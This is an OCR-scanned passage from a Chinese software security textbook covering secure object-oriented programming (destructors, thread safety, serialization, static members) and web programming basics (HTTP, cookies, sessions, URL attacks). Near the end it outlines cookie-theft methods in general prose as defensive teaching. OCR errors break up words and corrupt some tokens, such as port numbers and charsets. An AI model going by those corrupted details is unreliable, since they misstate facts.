额外 的 权限 ， 不 允许 使 用 空 口令 连接 数据 库 ， 防 止 管理 员 因 朴 忽而 创建 空 口令 ;数据 库 连接 
字符 串 存放 在 配置 文件 中 ， 最 好 可 以 加 密 ， 而 不 是 在 代码 中 以 明文 显示 ; 发 生 错误 时 ， 仪 给 
客户 端 通知 信息 ， 不 给 出 具体 原因 ， 防 止 攻 击 者 利用 这 些 通知 信息 进行 数据 库 猜测 。 


3.26 面向 对 象 中 的 安全 编程 


面向 对 象 (0O, Object Oriented) 是 目前 最 流行 的 软件 开发 方法 之 一 ， 也 是 当前 计算 机 软件 
工程 界 关注 的 重点 ， 从 20 世纪 90 年 代 开始 ， 它 就 慢 慢 成 为 软件 开发 方法 的 主流 。 目 前 ， 面 
向 对 象 的 概念 和 应 用 ， 己 经 不 仅 集中 于 程序 设计 和 软件 开发 ， 而 是 扩充 到 计算 机 应 用 的 其 他 
应 用 场合 ， 如 数据 库 系统 、 交 互 式 界面 、 应 用 结构 、 应 用 平台 、 分 布 式 系统 、 网 络 管理 结构 、 
CAD 技术 、 人 工 智能 等 领域 。 面 向 对 象 强 调 人 类 在 日 常 的 思维 逻辑 中 经 常 采 用 的 思维 方法 与 
原则 ， 其 中 的 重要 概念 如 抽象 、 分 类 、 继 承 、 聚 合 、 多 态 等 ， 都 和 我 们 的 生活 息息相关 ， 这 
也 成 为 面向 对 象 思想 流行 的 原因 。 对 象 的 生成 比较 简单 ， 涉 及 的 安全 考虑 也 不 多 ; 与 此 相对 
应 ， 对 象 的 内 存 也 有 释放 过 程 ， 它 与 系统 安全 性 的 关系 更 大 一 些 。 

现 以 C++ 为 例 ， 曾 述 对 象 在 内 存 中 的 存储 和 释放 情况 。 对 象 通常 存放 在 三 个 内 存 区 域 : 

1) 全 局 /静态 数据 区 : 主要 存放 全 局 对 象 和 静态 对 象 ， 在 该 内 存 区 的 对 象 或 成 员 ， 直 到 
进程 结束 ， 才 会 释放 内 存 。 

2) HE: 存在 于 堆 中 的 数据 , 分 配 内 存 的 方法 一 般 是 new/malloc, 释放 内 存 的 方法 是 delete/ 
free。 对 于 这 种 对 象 ， 可 对 创建 和 销毁 进行 精确 控制 。 堆 对 象 在 C++ 中 的 使 用 非常 广泛 ， 也 
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得 到 了 广泛 应 用 ， 不 过 ， 用 这 种 方法 分 配 或 释放 内 存 也 有 一 些 缺点 : 

。 需要 程序 员 手 工 管理 其 创建 和 释放 ， 如 果 忘 记 释 放 的 话 ， 可 能 造成 内 存 泄漏 ; 

。 在 时 间 效率 和 空间 效率 上 ， 堆 对 象 没有 栈 对 象 高 ; 

。 在 程序 中 ， 如 果 频 繁 使 用 new 来 创建 堆 对 象 或 用 delete 来 释放 堆 对 象 ， 会 造成 大 量 

的 内 存 碎片 ， 内 存 得 不 到 充分 使 用 。 

3) Hi: 栈 中 一 般 保 存 的 是 局 部 对 象 或 局 部 变量 ， 使 用 栈 对 象 效率 较 高 ， 程 序 员 无 须 对 其 
生存 周期 进行 管理 。 

C++ 中 ， 和 对 象 释放 内 存 相 关 的 一 般 是 析 构 函数 。 析 构 函数 的 作用 是 释放 对 象 申 请 的 资 
源 ， 析 构 函数 通常 由 系统 自动 调用 ， 在 以 下 几 种 情况 下 系统 会 调用 析 构 函数 : 

。 全 局 对 象 在 进程 结束 时 ; 

e 堆 中 对 象 进行 delete/free 操作 时 ; 

e 栈 中 对 象 生命 周期 结束 时 ， 包 括 离开 作用 域 、 函 数 正常 跳出 或 抛 出 异常 等 。 

在 使 用 析 构 函数 时 ， 可 以 充分 利用 它 的 性 质 进 行 一 些 操作 ， 特 别 是 对 于 栈 中 的 对 象 ， 由 
于 析 构 函数 调用 是 由 系统 自动 完成 的 ， 因 此 可 以 利用 这 一 特性 ， 将 一 些 需要 随 着 对 象 销毁 而 
必须 释放 的 资源 封装 在 析 构 函数 中 ， 由 系统 自动 完成 销毁 或 释放 ， 这 些 工 作 的 典型 案例 如 : 
某 些 资源 的 释放 、 多 线程 解锁 和 关闭 文件 等 。 这 样 ， 利 用 栈 对 象 的 这 一 特性 进行 自动 管理 ， 
可 以 避免 由 于 编程 时 的 遗漏 而 忘记 执行 某 种 操作 。 

很 多 情况 下 ， 对 象 可 能 在 多 线程 环境 下 运行 。 一 个 对 象 在 其 生命 周期 内 可 以 被 多 个 线程 
访问 ， 这 实际 上 是 多 线程 通信 的 一 种 方式 ， 此 种 情况 就 会 出 现 多 种 问题 ， 其 中 最 重要 的 就 是 
多 线程 环境 下 对 象 的 状态 安全 访问 以 及 修改 。 实 际 上 ， 很 多 系统 软件 (如 服务 器 ) 已 经 在 底层 
实现 了 线程 安全 ， 因 此 ， 隐 患 主要 来 源 于 : 程序 员 不 知道 该 组 件 对象 使 用 线程 来 实现 ， 错 误 
地 使 用 一 些 非 线程 机 制 情况 下 的 方法 。 

关于 对 象 线程 安全 ， 有 两 方面 的 问题 : 

1) 很 多 框架 下 都 提供 了 对 象 被 多 个 线程 访问 的 机 制 ， 当 对 象 可 能 被 多 个 线程 访问 时 , T 
万 不 能 在 对 象 中 保存 与 某 个 线程 相关 的 状态 。 

2) 当 对 象 可 能 被 多 个 线程 进行 操作 时 ， 应 该 考虑 同步 问题 。 

对 象 序列 化 是 面向 对 象 语言 中 的 重要 特性 之 一 ， 在 Java 系列 和 .NET 系列 中 ， 都 可 以 使 
用 一 定 手 段 实现 对 象 序列 化 。 一 般 情 况 下 ， 对 象 具有 一 定 的 生命 周期 ， 随 着 生成 该 对 象 的 程 
序 作用 域 结束 而 结束 。 但 有 时 ， 程 序 可 能 需要 将 对 象 的 状态 保存 下 来 ， 或 者 写 入 文件 ， 或 者 
写 入 数据 传输 流 ， 在 需要 时 再 将 对 象 读 入 之 后 进行 恢复 ， 这 其 中 就 需要 序列 化 工作 。 对 象 序 
列 化 就 是 将 对 象 的 状态 转换 成 字 节 流 (当然 也 可 能 是 字 节 流 以 上 的 一 些 包 装 流 )， 在 使 用 时 ， 
可 通过 读 取 流 中 的 内 容 ， 生 成 相同 状态 的 对 象 。 

序列 化 (Serialization) 过 程 的 工作 一 般 是 : 对 象 将 描述 自己 状态 的 数据 写 出 到 流 中 ， 描 述 
自己 状态 的 数据 一 般 是 成 员 变 量 ， 因 此 ， 序 列 化 的 主要 任务 是 写 出 对 象 成 员 变量 的 数值 。 特 
殊 情 况 下 如 果 对 象 中 某 个 成 员 变量 是 另 一 对 象 的 引用 ， 则 被 引用 的 对 象 也 要 序列 化 ， 因 此 ， 
序列 化 工作 是 递归 的 。 在 很 多 应 用 中 ， 对 象 序列 化 具有 很 重要 的 作用 。 如 数据 传输 软件 中 ， 
传输 的 数据 一 般 是 对 象 ， 这 种 情况 下 ， 对 象 应 该 具备 写 入 流 中 的 能 力 ， 也 就 是 说 需要 被 序列 
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化 ; 另外 一 些 情况 下 ， 可 能 需要 将 对 象 写 入 持久 化 存储 (如 数据 库 和 文件 )， 也 需要 进行 对 象 
的 序列 化 。 

以 Java 为 例 ， 将 对 象 序列 化 的 方法 很 简单 ， 满 足 两 个 条 件 即 可 : 

e 该 对 象 对 应 的 类 实现 Serializable 接口 。 

。 该 对 象 的 被 序列 化 成 员 必 须 是非 静 态 成 员 变量 。 

其 他 语言 中 ， 序 列 化 过 程 类 似 。 不 过 ， 对 象 序列 化 只 能 保存 成 员 变 量 的 值 ， 其 他 内 容 ， 
如 成 员 函 数 、 修 饰 符 等 ， 都 不 能 保存 。 
由 于 对 象 序列 化 之 后 要 在 网 上 传输 ， 或 者 写 入 数据 流 ， 因 此 需要 关心 的 问题 一 般 是 信息 
泄密 问题 。 对 象 被 序列 化 时 ， 使 用 字 节 数组 表示 ， 并 加 上 很 多 控制 标记 ， 在 一 定 程度 上 阻止 
了 对 象 成 员 直接 被 攻击 者 识别 。 但 还 是 不 能 完全 阻止 对 象 内 容 的 泄密 ， 攻 击 者 对 保存 的 对 象 
稍 加 分 析 ， 则 可 获取 需要 的 信息 。 所 以 ， 在 序列 化 时 ， 一 定 要 注意 不 能 让 敏感 信息 (如 卡号 密 
FEIRE 

解决 该 问题 的 方法 有 两 种 : 

1) 在 将 对 象 实现 序列 化 时 进行 一 些 处 理 ， 如 加 密 。 该 类 方法 将 在 后 续 章 节 中 详细 叙述 。 

2) 不 要 将 敏感 信息 序列 化 。 

可 通过 一 些 手段 ， 不 将 某 些 成 员 序列 化 。 如 在 Java 中 ， 可 在 成 员 前 面 加 上 transient 关键 
字 ， 在 序列 化 时 ， 系 统 将 回避 这 些 字 段 。 

在 类 中 ， 数 据 成 员 可 分 为 静态 成 员 、 非 静态 成 员 两 种 。 

类 中 的 成 员 ， 通 常情 况 下 ， 必 须 通 过 它 的 类 的 对 象 来 访问 ， 但 可 以 创建 这 样 一 个 成 员 ， 
使 它 的 使 用 完全 独立 于 该 类 的 任何 对 象 ， 被 类 的 所 有 对 象 共用 。 

在 成 员 的 声明 前 面 加 上 关键 字 static( 静 态 ) 就 能 创建 这 样 的 成 员 , 这 种 成 员 称 为 静态 成 员 。 
如 果 一 个 成 员 变量 或 成 员 方法 被 声明 为 static， 它 就 是 静态 变量 或 静态 方法 ， 它 能 够 在 该 类 的 
任何 对 象 创建 之 前 被 访问 ， 而 不 必 引 用 任何 对 象 。 

静态 成 员 变量 存储 在 全 局 数据 区 , 为 该 类 的 所 有 对 象 共享 , 不 属于 任何 对 象 的 存储 空间 ， 
逻辑 上 所 有 对 象 都 共享 这 一 存储 单元 ， 对 静态 成 员 变 量 的 任何 操作 都 会 影响 这 一 存储 单元 的 
所 有 对 象 。 

静态 成 员 从 属于 一 个 类 , 不 是 某 对 象 的 一 部 分 , 非 静态 成 员 可 直接 访问 类 中 的 静态 成 员 ， 
但 静态 成 员 不 可 以 访问 非 静态 成 员 。 

静态 成 员 的 优点 是 ， 消除 传统 程序 设计 方法 中 的 全 局 变量 ， 为 真正 实现 封装 性 提供 了 必 
要 手段 。 由 于 静态 成 员 的 共享 性 ， 就 必须 考虑 其 数据 安全 。 

除了 上 一 节 讲 到 的 线程 安全 外 ， 还 必须 考虑 对 象 对 其 进行 访问 时 的 安全 性 。 要 注意 以 下 
几 点 : 

1) 静态 成 员 的 初始 化 操作 先 于 对 象 的 实例 化 而 进行 , 所 以 在 它们 的 初始 化 中 不 要 启动 线 
程 ， 以 免 造 成 数据 访问 的 问题 ， 同 时 静态 成 员 的 初始 化 操作 中 也 不 应 该 有 依赖 关系 ; 

2) 不 用 静态 变量 保存 某 个 对 象 的 状态 ， 而 应 该 保存 所 有 对 象 共有 的 状态 ; 

3) 不 用 对 象 来 访问 静态 变量 ， 而 用 类 名 来 访问 静态 变量 。 
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3.2/7 Web 编程 安全 


Web 编程 是 目前 比较 流行 的 软件 编程 方法 之 一 ， 也 是 B/S 模式 的 一 种 实现 方式 ， 由 于 
Web 编程 的 方法 和 传统 C/S 程序 的 不 相同 ， 因 此 Web 编程 中 的 安全 问题 也 有 其 特殊 性 。 

随 着 Intemet 技术 的 兴起 ，B/S 结构 成 为 对 C/S 结构 的 一 种 改进 。 这 种 结构 有 如 下 特点 : 

e 程序 完全 放 在 应 用 服务 器 上 ， 并 在 应 用 服务 器 上 运行 ， 通 过 应 用 服务 器 与 数据 库 服 


务 器 通信 ; 
。 客户 机 上 不 必 安 装 任何 客户 端 软件 ， 系 统 界面 通过 客户 端 浏 览 器 呈现 ， 客 户 端 只 需 
要 在 浏览 器 内 输入 URL; 


。 修改 了 应 用 系统 ， 只 需要 维护 应 用 服务 器 。 

由 于 B/S 结构 的 优点 ， 现 在 的 网 络 应 用 系统 中 ，B/S 系统 占 绝对 主流 地 位 。 

了 解 了 什么 是 Web 程序 ， 我 们 再 深入 了 解 一 下 Web 技术 的 相关 特点 。 在 Web 程序 结构 
中 ， 浏 览 器 端 与 应 用 服务 器 端 采用 请 求 /响应 模式 进行 交互 。 

过 程 描述 ( 见 图 3-4) 如 下 : 

1) 客户 端 (通常 是 浏览 器 ， 如 正 、Firefox 等 ) 接 受用 户 的 输入 ， 如 用 户 名 、 密 码 、 查 询 字 
符 串 等 ， 

2) 客户 端 向 应 用 服务 器 发 送 请 求 : 输入 之 后 提交 ， 客 户 端 把 请 求 信息 (包含 表单 中 的 输 
入 以 及 其 他 请 求 等 信息 ) 发 送 到 应 用 服务 器 端 ， 客 户 端 等 待 服务 器 端的 响应 ; 

3) 数据 处 理 : 应 用 服务 器 端 使 用 某 种 脚本 语言 来 访问 数据 库 查 询 数据 , 并 获得 查询 结果 ; 

4) 数据 库 向 应 用 服务 器 中 的 程序 返回 结果 ; 

5) 发 送 响应 : 应 用 服务 器 端 向 客户 端 发 送 响 应 信息 (一 般 是 动态 生成 的 HTML 页 面 ); 

6) 显示 : 由 用 户 的 浏览 器 解释 HTML 代码 ， 呈 现 用 户 界面 。 


2. 发 送 请 求 3. 访问 数据 

L MPRA Cs] 发 送 请 求 " 访问 数据 
服务 器 |< 

6. 显示 “5. 返回 响应 4. i [ula 


图 3-4 B/S 系统 交互 流程 


1. Web 编程 相关 技术 


可 以 说 ， 不 同 的 Web 编程 语言 都 对 应 着 不 同 的 Web 编程 方式 。 下 面 介绍 几 种 常见 的 与 
Web 编程 相关 的 技术 : 

1) HTTP 

超 文本 传输 协议 (HTTP, HyperText Transfer Protocol) 是 互联 网 上 应 用 最 为 广泛 的 一 种 网 
络 协议 。 所 有 的 Web 文件 都 必须 遵守 这 个 标准 。HTTP 协议 建立 在 TCP/IP 传输 方式 之 上 ， 
基于 文本 方式 进行 交互 ,每 个 HITP 会 话 会 先 与 服务 器 端 建立 一 个 TCP 连接 , 通常 连接 SO 
端口 ， 然 后 对 要 获取 的 URL 发 出 具体 的 请 求 信息 。 而 在 响应 时 ， 服 务 器 端 会 返回 被 请 求 的 
文件 内 容 。 它 的 基本 工作 流程 是 : 客户 端 向 服务 器 发 送 一 个 请 求 ， 请 求 头 包含 请 求 的 方法 、 
URL、 协 议 版 本 ， 以 及 包含 请 求 修饰 符 、 客 户 信息 和 内 容 的 类 似 于 MIME 的 消息 结构 。 服 务 
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器 以 一 个 状态 行 作为 响应 ， 响 应 的 内 容 包括 消息 协议 的 版 本 ， 成 功 或 者 错误 编码 加 上 包含 服 
务 器 信息 、 实 体 元 信息 以 及 可 能 的 实体 内 容 。 一 个 HTTP 请 求 报 文 由 请 求 行 (request line)、 请 
求 头 部 (headenD、 空 行 和 请 求 数据 4 个 部 分 组 成 .HTTP 协议 的 请 求 方法 有 GET、POST、HEAD、 
PUT、DELETE、OPTIONS、TRACE、CONNECT。 下 面 是 一 个 GET 的 请 求 过 程 : 


GET /search?hl-zh-CN&source-hp&q-domety&aq-f&oq- HTTP/1.1 

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/vnd.ms-excel, application/vnd.ms-powerpoint, 
application/msword, application/x-silverlight, application/x-shockwave-flash, 
*/* 

Referer: «a href-"http://www.google.cn/"»http://www.google.cn/«/a» 

Accept-Language: zh-cn 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 
2.0.50727; TheWorld) 

Host: «a href-"http://www.google.cn"»www.google.cn«/a» 

Connection: Keep-Alive 


HTTP 响应 也 由 三 个 部 分 组 成 , 分 别 是 : 状态 行 、 消 息 报头 、 响 应 正文 。 下 面 是 一 个 HITP 
响应 报 文 : 

HTTP/1.1 200 OK 

Date: Sun, 31 May 2015 23:59:59 GMT 


Content-Type: text/html;charset-I18S0-8859-1 
Content-Length: 122 


<html> 

<head> 

<title>Wrox Homepage</title> 
</head> 

<body> 

<!-- body goes here --> 
</body> 

</html> 


2) Cookie 

Cookie 是 Web 最 重要 的 协议 扩展 之 一 。Cookie 机 制 的 使 用 过 程 首先 是 由 服务 器 端 返回 
一 个 Set-Cookie 响应 头 ， 把 一 组 短小 而 不 透明 的 “名 称 = 值 ”格式 的 数据 保存 到 浏览 器 端 ， 
在 客户 端 再 次 提交 请 求 时 ， 会 把 之 前 保存 下 来 的 Cookie 参数 再 返回 给 服务 器 端 ， 服 务 器 就 可 
以 重新 取 回 这 些 信息 了 。Cookie 是 到 目前 为 止 ， 保 持 会 话 和 用 户 授权 请 求 的 最 常用 方式 。 

Cookie 的 内 容 主要 包括 : 名 字 、 值 、 过 期 时 间 、 路 径 和 域 。 路 径 与 域 一 起 构成 cookie 
的 作用 范围 。 若 不 设置 过 期 时 间 ， 则 表示 这 个 cookie 的 生命 期 为 浏览 器 会 话 期 间 ， 关 闭 浏览 
器 窗口 , cookie 就 消失 。 这 种 生命 期 为 浏览 器 会 话 期 的 cookie 被 称 为 会 话 cookie. 会 话 cookie 
一 般 不 存储 在 硬盘 上 而 是 保存 在 内 存 中 ， 当 然 这 种 行为 并 不 是 规范 规定 的 。 若 设置 了 过 期 时 
间 ， 浏 览 器 就 会 把 cookie 保存 到 硬盘 上 ， 关 闭 后 再 次 打开 浏览 器 ， 这 些 cookie 仍然 有 效 直到 
超过 设 定 的 过 期 时 间 。 存储 在 硬盘 上 的 cookie 可 以 在 不 同 的 浏览 器 进程 间 共 享 ， 比 如 两 个 正 


*88* 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


窗口 。 而 对 于 保存 在 内 存 中 的 cookie， 不 同 的 浏览 器 有 不 同 的 处 理 方式 。 


3) Session 

Session 机 制 是 一 种 服务 器 端的 机 制 ， 服 务 器 使 用 一 种 类 似 于 散 列表 的 结构 (也 可 能 就 是 
使 用 散 列表 ) 来 保存 信息 。 当 程序 需要 为 某 个 客户 端的 请 求 创建 一 个 session 时 ， 服 务 器 首先 
检查 这 个 客户 端的 请 求 中 是 否 已 包含 了 一 个 session 标识 ( 称 为 session id)， 如 果 已 包含 ， 则 说 
明 以 前 已 经 为 此 客户 端 创建 过 session， 服 务 器 就 按照 session id 把 这 个 session 检索 出 来 使 用 
(检索 不 到 ， 会 新 建 一 个 )， 如 果 客 户 端 请 求 不 包含 session id， 则 为 此 客户 端 创建 一 个 session 
并 且 生成 一 个 与 此 session 相关 联 的 session id, session id 的 值 应 该 是 一 个 既 不 会 重复 、 又 不 
容易 被 找到 规律 以 仿造 的 字符 串 ， 这 个 session id 将 被 在 本 次 响应 中 返回 给 客户 端 保 存 。 保存 
这 个 session id 的 方式 可 以 采用 cookie, 这 样 在 交互 过 程 中 浏览 器 可 以 自动 地 按照 规则 把 这 个 
标识 发 送 给 服务 器 。 一 般 这 个 cookie 的 名 字 都 是 类 似 于 SEEESIONID. 但 cookie 可 以 被 人 为 
地 禁止 ， 则 必须 有 其 他 机 制 以 便 在 cookie 被 禁止 时 仍然 能 够 把 session id 传递 回 服务 器 。 


4) HTTPS 

HITPS( 全 称 ， Hyper Text Transfer Protocol over Secure Socket Layer)， 是 以 安全 为 目标 的 
HTTP 通 道 , 简单 讲 是 HTTP 的 安全 版 。 即 HTTP 下 加 入 SSL 层 , HTTPS 的 安全 基础 是 SSL， 
因此 加 密 的 详细 内 容 就 需要 SSL。 它 是 一 个 URI scheme( 抽 象 标识 符 体系 )， 句 法 类 同 http: 体 
系 ， 用 于 安全 的 HTTP 数据 传输 。 它 与 HTTP 的 区 别 是 : 

a) https 协议 需要 到 ca 申请 证 书 ， 一 般 免 费 证 书 很 少 ， 需 要 交 费 。 

b) http 是 超 文本 传输 协议 , 信息 是 明文 传输 ，https 则 是 具有 安全 性 的 ssl 加 密 传输 协议 。 

c) http 和 https 使 用 的 是 完全 不 同 的 连接 方式 ， 用 的 端口 也 不 一 样 ， 前 者 是 80， 后 者 是 
443。 

d) http 的 连接 很 简单 ， 是 无 状态 的 ，HTTPS 协议 是 由 SSL+HTTP 协议 构建 的 可 进行 加 
密 传输 、 身 份 认 证 的 网 络 协 议 ， 比 http 协议 安全 。 


5) HTML 

HTML 是 一 种 超 文本 标记 语言 或 超 文本 链接 标识 语言 ， 是 万 维 网 浏览 器 使 用 的 一 种 语 
言 ， 它 消除 了 不 同 计算 机 之 间 信 息 交 流 的 障碍 。HTML 是 标准 通用 标记 语言 下 的 一 个 应 用 ， 
也 是 一 种 规范 ， 一 种 标准 ， 它 通过 标记 符号 来 标记 要 显示 的 网 页 中 的 各 个 部 分 。 网 页 文件 本 
身 是 一 种 文本 文件 , 通过 在 文本 文件 中 添加 标记 符 , 可 以 告诉 浏览 器 如 何 显示 其 中 的 内 容 ( 如 : 
文字 如 何 处 理 ， 画 面 如 何 安排 ， 图 片 如 何 显示 等 )。 浏 览 器 按 顺 序 阅读 网 页 文件 ， 然 后 根据 标 
记 符 解 释 和 显示 其 标记 的 内 容 ， 对 书写 出 错 的 标记 将 不 指出 其 错误 ， 且 不 停止 其 解释 执行 过 
程 ， 编 制 者 只 能 通过 显示 效果 来 分 析出 错 原因 和 出 错 部 位 。 但 需要 注意 的 是 ， 对 于 不 同 的 浏 
览 器 ， 对 同一 标记 符 可 能 会 有 不 完全 相同 的 解释 ， 因 而 可 能 会 有 不 同 的 显示 效果 。 


6) XML 
XML, 可 扩展 标记 语言 。 它 是 一 种 元 标记 语言 ， 即 定义 了 用 于 定义 其 他 特定 领域 有 关 语 
义 的 、 结 构 化 的 标记 语言 ， 这些 标记 语言 将 文档 分 成 许多 部 件 并 对 这 些 部 件 加 以 标识 。 XML 


第 3 章 软件 安全 开发 *89* 


文档 定义 方式 有 : 文档 类 型 定义 DTD) 和 XML Schema. DTD 定义 了 文档 的 整体 结构 以 及 文 
档 的 语法 ， 应 用 广泛 并 有 丰富 工具 支持 。XML Schema 用 于 定义 管理 信息 等 更 强大 、 更 丰富 
的 特征 。XML 能 够 更 精确 地 声明 内 容 ， 方 便 跨 越 多 种 平台 的 更 有 意义 的 搜索 结果 。 它 提供 
了 一 种 描述 结构 数据 的 格式 , 简化 了 网 络 中 的 数据 交换 和 表示 , 使 得 代码 、 数 据 和 表示 分 离 ， 
并 作为 数据 交换 的 标准 格式 ， 因 此 它 常 被 称 为 智能 数据 文档 。 


7) JavaScript 

JavaScript 是 一 种 直译 式 脚本 语言 ， 是 一 种 动态 类 型 、 弱 类 型 、 基 于 原型 的 语言 ， 内 置 
支持 类 型 。 它 的 解释 器 被 称 为 JavaScript 引擎 ， 为 浏览 器 的 一 部 分 ， 广 泛 用 于 客户 端的 脚本 
语言 , 最 早 是 在 HTML( 标 准 通用 标记 语言 下 的 一 个 应 用 ) 网 页 上 使 用 , 用 来 给 HTML 网 页 增加 
动态 功能 。 它 的 主要 用 途 如 下 : 

a) 将 动态 文本 嵌入 HTML 页 面 。 

b) 对 浏览 器 事件 做 出 响应 。 

c) 读 写 HTML 元 素 。 

d) 在 数据 被 提交 到 服务 器 之 前 验证 数据 。 

e) 检测 访客 的 浏览 器 信息 。 

f) 控制 cookies， 包 括 创 建 和 修改 等 。 

g) 基于 Nodejs 技术 进行 服务 器 端 编 程 。 

了 解 上 述 相关 技术 ， 可 以 帮助 我 们 理解 下 面 小 节 的 内 容 。 

2. 避免 URL 攻击 


Web 上 有 很 多 资源 ， 如 HTML 文档、 图像、 视频、 程序 等 ， 在 访问 时 ， 它 们 的 具体 位 
置 怎样 确定 呢 ? 通常 是 利用 URL. 

URL(Uniform Resource Locator， 统 一 资源 定位 器 ) 是 Intemet 上 用 来 描述 信息 资源 的 字符 
串 ， 可 帮助 计算 机 来 定位 这 些 Web 上 的 可 用 资源 。 

以 下 是 一 个 典型 的 URL 例子 : http://localhost:8080/Prj08/index.jsp?usemame=gkhua。 可 以 
fii, URL 一 般 由 四 部 分 组 成 : 

。 访问 资源 的 命名 机 制 (协议 ):，http， 实 际 上 还 可 能 是 ftp 等 ; 

o 存放 资源 的 主机 名 : localhost:8080; 

。 资源 自身 的 名 称 ， 由 路 径 表 示 : /Prj08/indexjsp; 

。 其 他 信息 ， 如 查询 字符 串 等 ?usemame=gkhua。 

URL 操作 攻击 的 原理 ， 一 般 是 通过 URL 来 猜测 某 些 资源 的 存放 地 址 ， 从 而 非法 访问 受 
保护 的 资源 。 

为 防止 URL 操作 攻击 ， 程 序 员 在 编写 Web 应 用 时 ， 可 从 以 下 方面 加 以 注意 : 

。 为 避免 非 登 录用 户 进行 访问 ， 对 于 每 一 个 只 有 登录 成 功 才能 访问 的 页 面 ， 应 该 进行 

session 检查 (session 检查 的 内 容 将 在 稍 后 提 到 ); 
。 为 限制 用 户 访问 未 被 授权 的 资源 ， 可 在 查询 时 将 登录 用 户 的 用 户 名 也 考虑 进去 。 


P 
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3. 页 面 状态 值 安全 
HTTP 是 无 状态 的 协议 ， 除 非 通过 服务 器 ，Web 页 面 本 身 无 法 向 下 一 个 页 面 传递 信息 。 


EB 


JE, Web 页 面 保持 状态 并 传递 给 其 他 页 面 是 一 个 重要 技术 。 
举 一 个 简单 的 案例 ; 页面 1 中 定义 了 一 个 数值 变量 ， 并 通过 计算 ， 将 其 平方 值 显示 在 界 
面 上 ， 同 时 页 面 1 中 有 一 个 链接 到 页 面 2， 要 求 点 击 链接 ， 在 页 面 2 中 显示 该 数字 的 立方 。 


很 明显 ， 该 应 用 中 ， 页 面 2 必须 知道 页 面 1 中 定义 的 那个 变量 。 
在 HITP 协议 中 共有 4 种 方法 来 完成 这 件 事 情 : 
。 URL 传 值 


。 表单 传 值 


* Cookie 方 法 
e session 方法 


这 4 种 方法 各 有 特点 ， 各 有 安全 优势 ， 本 节 将 对 其 进行 分 析 。 


URL 方法 


于 其 简单 性 和 平台 支持 的 多 样 性 (没有 浏览 器 不 支持 URL)， 很 多 程序 使 用 


URL 传 值 比较 方便 。 
但 该 方法 有 如 下 问题 : 
。 传输 的 数据 只 能 是 字符 串 ， 对 数据 类 型 具有 一 定 限制 ; 
。 传输 数据 的 值 会 在 浏览 器 地 址 栏 中 被 看 到 。 从 保密 角度 看 ， 这 是 不 安全 的 。 特 别 是 
安全 性 要 求 很 严格 的 数据 (如 密码 ) 不 应 该 用 URL 方法 来 传 值 。 
与 URL 一 样 ， 表 单传 值 方法 简单 方便 ， 支 持 多 平台 ， 很 多 程序 使 用 这 种 方法 。 但 该 方 


法 有 如 下 问题 : 


* 与 URL 方法 类 似 ， 该 方法 传输 的 数据 也 只 能 是 字符 串 ， 对 数据 类 型 具有 一 定 限制 ; 

。 传输 数据 的 值 虽然 可 以 保证 在 浏览 器 地 址 栏 内 不 被 看 到 ， 但 在 客户 端 源 代码 中 会 被 
看 到 。 因 此 ， 从 保密 角度 看 ， 这 也 是 不 安全 的 。 特 别 是 秘密 性 要 求 很 严格 的 数据 (如 
密码 )， 也 不 推荐 用 表单 方法 来 传 值 。 

e 基于 Cookie 的 工作 原理 ， 上 面 的 例子 可 以 用 Cookie 来 进行 。 即 在 第 一 个 页 面 中 , 将 

要 共享 的 变量 值 保存 在 客户 端 Cookie 文件 内 ， 在 客户 端 访问 第 二 个 页 面 时 ， 由 于 浏 
览 器 自动 将 Cookie 读 入 之 后 ， 传 给 服务 器 端 ， 因 此 只 需要 第 二 个 页 面 中 由 服务 器 端 
页 面 读 取 这 个 Cookie 值 即 可 。 在 客户 端的 浏览 器 上 ， 我 们 看 不 到 任何 与 传递 的 值 相 
关 的 信息 ， 说 明 在 客户 端 浏 览 器 中 ，Cookie 中 的 数据 是 安全 的 。 

但 也 不 能 说 Cookie 是 完全 安全 的 。 因 为 Cookie 是 以 文件 形式 保存 在 客户 端的 ， 客 户 端 
存储 的 Cookie 文件 就 可 能 被 攻击 者 获知 。 在 本 例 中 ， 内 容 被 保存 在 Cookie 文件 中 ， 如 果 使 
用 的 是 Windows XP, C 盘 是 系统 盘 ， 该 文件 保存 在 C:\Documents and Settings\ 当 前 用 户 名 
\Cookies 下 。 很 明显 , Cookie 也 不 是 绝对 安全 的 。 如 果 将 用 户 名 、 密 码 等 敏感 信息 保存 在 Cookie 
内 ， 在 用 户 离开 客户 机 时 不 注意 清空 ， 这 些 信息 容易 泄露 ， 因 此 Cookie 在 保存 敏感 信息 方面 


具有 潜在 危险 。 


可 以 很 清楚 地 看 到 ，Cookie 的 危险 性 来 源 于 Cookie 可 能 被 盗 取 。 目 前 盗 取 的 方法 有 很 


多 种 : 
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1) 利用 跨 站 脚本 技术 ， 将 信息 发 给 目标 服务 器 ;为 了 隐藏 跨 站 脚本 的 URL， 甚 至 可 以 
结合 Ajax( 异 步 JavaScript 和 XML 技术 ) 在 后 台 窃 取 Cookie。 

2) 通过 某 些 软件 ， 窃 取 硬 盘 下 的 Cookie。 如 前 所 述 ， 当 用 户 访问 完 某 站 点 后 ，Cookie 
文件 会 保存 在 机 器 的 某 个 文件 夹 (如 C:\Documents and Settings\ 用 户 名 \Cookies) 下 ， 因 此 可 以 
通过 某 些 资 取 和 分 析 软 件 来 盗 取 Cookie。 具 体 步 骤 如 下 : 

。 利用 盗 取 软 件 分 析 系 统 中 的 Cookie， 列 出 用 户 访问 过 的 网 站 ; 

e 在 这 些 网 站 中 寻找 攻击 者 感 兴 趣 的 网 站 ; 

e 从 该 网 站 的 Cookie 中 获取 相应 信息 。 

不 同 的 软件 有 不 同 的 实现 方法 ， 有 兴趣 的 读者 可 在 网 上 搜索 相应 的 软件 。 

3) 利用 客户 端 脚本 盗 取 Cookie。 在 JavaScript 中 有 很 多 API 可 以 读 取 客 户 端 Cookie, 可 
将 这 些 代 码 隐藏 在 一 个 程序 (如 图 片 ) 中 ， 很 隐秘 地 得 到 Cookie 值 ， 不 过 这 也 是 跨 站 脚本 的 一 
种 实现 方式 。 

同样 ， 以 上 问题 不 代表 Cookie 就 没有 任何 用 处 ，Cookie 在 Web 编程 中 还 是 应 用 很 广泛 
的 ， 主 要 是 因为 以 下 几 个 方面 

1) Cookie 的 值 能 够 持久 化 ， 即 使 客户 端 机 器 关闭 ， 下 次 打开 还 是 可 以 得 到 里 面 的 值 。 因 
